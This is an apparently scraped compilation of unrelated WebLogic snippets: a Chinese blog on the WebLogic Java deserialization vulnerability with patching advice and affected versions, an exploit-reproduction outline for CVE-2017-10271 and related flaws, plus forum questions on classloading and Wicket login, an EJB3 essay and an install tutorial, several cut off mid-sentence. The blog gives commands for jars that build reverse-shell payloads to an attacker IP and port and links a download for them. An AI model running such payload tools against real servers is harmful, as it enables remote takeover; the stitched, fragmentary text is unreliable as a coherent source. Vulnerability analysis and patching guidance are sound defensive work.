weblogic

0x00 前言 目前oracle还没有在公开途径发布weblogic的JAVA反序列化漏洞的官方补丁，目前看到的修复方法无非两条： 使用SerialKiller替换进行序列化操作的ObjectInputStream类; 在不影响业务的情况下，临时删除掉项目里的 “org/apache/commons/collections/functors/InvokerTransformer.class”文件。 ObjectInputStream类为JRE的原生类，InvokerTransformer.class为weblogic基础包中的类，对上述两个类进行修改或删除，实在无法保证对业务没有影响。如果使用上述的修复方式，需要大量的测试工作。且仅仅删除InvokerTransformer.class文件，无法保证以后不会发现其他的类存在反序列化漏洞。 因此本文针对weblogic的JAVA序列化漏洞进行了分析，对多个版本的weblogic进行了测试，并提出了更加切实可行的修复方法。 0x01 为什么选择weblogic的JAVA反序列化漏洞进行分析 weblogic与websphere为金融行业使用较多的企业级JAVA中间件； weblogic比websphere市场占有率高； 利用websphere的JAVA反序列化漏洞时需要访问8880端口，该端口为websphere的wsadmin服务端口

为了方便小伙伴们使用，我导出了两个jar包，分别用于制作反弹shell的payload和测试的payload。 使用方法和利用方法请仔细看下面的截图： 1、制作反弹shell的payload并利用： 命令： java -jar makeshell.jar 你的IP 监听端口 payload名 如： java -jar makeshell.jar 202.112.221.32 8888 D:\\java\\shellpayload 1、制作POC的payload并利用： 命令： java -jar makepoc.jar 请求的URL payload名 如： java -jar makpoc.jar http://www.xxxxx.org/xxooxxooxxoo.txt D:\\java\\pocpayload 脚本下载： http://pan.baidu.com/s/1hrfjdDM 仅供运维测试漏洞，请勿非法使用，否则后果自负！ 来源： CSDN 作者： aaa0404524 链接： https://blog.csdn.net/aaa0404524/article/details/50655443

目录 Weblogic反序列化漏洞 Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞（CVE-2017-10271） Weblogic WLS Core Components 反序列化命令执行漏洞（CVE-2018-2628） Weblogic反序列化漏洞（CVE-2019-2725） JBOSS反序列化漏洞 JBoss 4.x JBossMQ JMS 反序列化漏洞（CVE-2017-7504） JBoss 5.x/6.x 反序列化漏洞复现（CVE-2017-12149） JBoss JMXInvokerServlet 反序列化漏洞 RMI反序列化漏洞 Fastjson反序列化漏洞 Weblogic反序列化漏洞 Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞（CVE-2017-10271） Weblogic的WLS Security组件对外提供webservice服务，其中使用了XMLDecoder来解析用户传入的XML数据，在解析的过程中出现反序列化漏洞，导致可执行任意命令。 这个漏洞利用工具是：java反序列终极化工具.jar 我们先启动靶机环境，访问： http://192.168.10.13:7001/ 打开我们的 java反序列终极化工具.jar工具，选择Weblogic

据Oracle、Cert及我们自测，受影响版本包括但不限于： - 9.2.3.0 - 9.2.4.0 - 10.0.0.0 - 10.0.1.0 - 10.0.2.0 - 10.2.6.0 - 10.3.0.0 - 10.3.1.0 - 10.3.2.0 - 10.3.3.0 - 10.3.4.0 - 10.3.5.0 - 10.3.6.0 - 12.1.1.0 - 12.1.2.0 - 12.1.3.0 - 12.2.1.0 JAVA反序列化漏洞检测工具 下载地址： http://download.csdn.net/detail/igangnamstyle/9494215 运行 java - jar WebLogic_EXP.jar 非oracle官方修复方法（需重启weblogic）： Apache官方最近发布了commons-collections的新版本，下载地址： http://commons.apache.org/proper/commons-collections/download_collections.cgi 或 http://download.csdn.net/detail/igangnamstyle/9494217 修复方法为替换有漏洞的commons-collections组件 建议：原来是3.2.x就替换为3.2.2，原来是4.x就替换为4.4.1

I have an EAR file that contains two different jars that share some classes with an identical package+class name. This results in importance of classloading inside the EAR file itself. How can I tell Weblogic to load one jar from APP-INF/lib before loading a different one in the same APP-INF/lib? I need to define a specific order to that if there is a conflict, it will take from JAR a and not JAR b. I'm using Webogic 11g (10.3). Thanks. The top-level element in weblogic-application.xml has an optional classloader-structure element that you probably want to look into. For instance you can do

在我Support过的许多BEA客户里面，80%依然使用EJB2，20%已经开始使用Spring，但几乎没有看到有真实的大客户在关键系统中使用 EJB3，EJB3的技术其实已经很成熟，在分布式能力上，WebLogic EJB2.0容器经过10年的改进，在分布式性能以及稳定性方面，已经相当成熟，强大的JMX支持亦为WebLogic赢得更多的商业用户。尽管EJB2 的复杂性，但BEA毕竟将这些复杂性降至最低，比如通过WebLogic的Ant Task扩展，weblogic.ejb.GenericSessionBean等等，但这一切依然没有解决无接口不OO的尴尬局面（EJB3做到了真正的POJO化，即ReviewManagerBean是implements ReviewService，POJOer舒了一口气），且IDE工具的重构也更加容易直观。 EJB3的Annotation改善了POJOer的Coding状况，却没有增加EJB容器厂家很多的工作量。各个中间件厂商依然使用他们原有的EJB CodeBase作为EJB3的基础，因此，我们完全信任EJB3的稳定性和可靠性。 在中间件厂家的角度，EJB3其实可以分为两个部分： A1，Session Bean、MDB领域【具有分布式容器依赖性】 A2，持久层实现（JPA）【对分布式容器无依赖性】 在 A1领域，中间件厂家更关注于属于容器的范畴

Installing Oracle Enterprise Manager Grid Control 11g Release 1 (11.1.0.1.0) Linux x86 This tutorial contains the following sections: Purpose Time to Complete Overview Scenario Software Requirements Prerequisites Configuring the Operating System Installing Oracle WebLogic Server 11g Release 1 (10.3.2) Linux x86 Installing Oracle Database 11g Release 2 (11.2.0.1.0) Linux x86 Installing Oracle Enterprise Manager Grid Control 11g Release 1 (11.1.0.1.0) Linux x86 Accessing Oracle Enterprise Manager Grid Control with a Browser Summary Resources Purpose In this tutorial, you learn how to install

I want make weblogic form validation in wicket but I dont know how to create login page. I followed this tutorial where is example in jsp: http://docs.oracle.com/cd/E13222_01/wls/docs100/security/thin_client.html#wp1057581 I create similar form in wicket but I dont know what should I do when I push submit button. There is some action called "j_security_check" but i dont know how should i implement it in java and wicket UPDATE: I am using weblogic 10.something and I cant use newest I try to create my own impelemtation but when I try to use login wicket throw exception: java.lang